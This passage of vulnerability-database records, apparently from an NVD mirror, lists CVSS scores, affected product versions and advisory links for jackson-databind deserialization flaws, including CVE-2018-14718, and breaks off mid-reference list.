cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 10, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.543", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-918", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-01-02 18:29
Modified
2024-11-21 03:49
Severity ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "7036DA13-110D-40B3-8494-E361BBF4AFCD", versionEndExcluding: "2.6.7.3", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "FD945A04-174C-46A2-935D-4F92631D1018", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", versionEndExcluding: "11.2.0.3.23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "BFD43191-E67F-4D1B-967B-3C7B20331945", versionEndExcluding: "12.2.0.1.19", versionStartIncluding: "12.2.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "062C588A-CBBA-470F-8D11-2F961922E927", versionEndExcluding: "13.9.4.2.1", versionStartIncluding: "13.9.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*", matchCriteriaId: "989598A3-7012-4F57-B172-02404E20D16D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*", matchCriteriaId: "63C59FA7-F321-4475-9F71-D78E0C890866", versionEndExcluding: "19.3.12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:nosql_database:19.3.12:*:*:*:*:*:*:*", matchCriteriaId: "9E215743-2B5D-4EA5-A8F5-BBEC4DC85C35", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "7A1E1023-2EB9-4334-9B74-CA71480F71C2", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", matchCriteriaId: "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", matchCriteriaId: "3F021C23-AB9B-4877-833F-D01359A98762", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", matchCriteriaId: "2F8ED016-32A1-42EE-844E-3E6B2C116B74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*", matchCriteriaId: "A046CC2C-445F-4336-8810-930570B4FEC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", matchCriteriaId: "0745445C-EC43-4091-BA7C-5105AFCC6F1F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", matchCriteriaId: "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*", matchCriteriaId: "9967AAFD-2199-4668-9105-207D4866B707", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:*:*:*:*:*:*:*:*", matchCriteriaId: "25993ED6-D4C7-4B68-9F87-274B757A88CC", versionEndIncluding: "19.8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "2F10FB4D-A29B-42B4-B70E-EB82A93F2218", versionEndIncluding: "19.10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", matchCriteriaId: "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3A76E5BF-01E4-46E7-8E3B-5ACE75657360", versionEndExcluding: "3.11.153", versionStartIncluding: "3.11", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "E9A6D103-9674-4B04-8397-86501F1D91CF", versionEndExcluding: "4.6.26", versionStartIncluding: "4.6", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", matchCriteriaId: "4DBCD38F-BBE8-488C-A8C3-5782F191D915", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D2452F48-6A8B-4274-B0CE-F1256F400170", versionEndExcluding: "4.1.18", versionStartIncluding: "4.1", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos ejecutar código arbitrario aprovechando un fallo para bloquear la clase slf4j-ext de deserialización polimórfica.", }, ], id: "CVE-2018-14718", lastModified: "2024-11-21T03:49:39.707", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.310", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/106601", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/106601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: 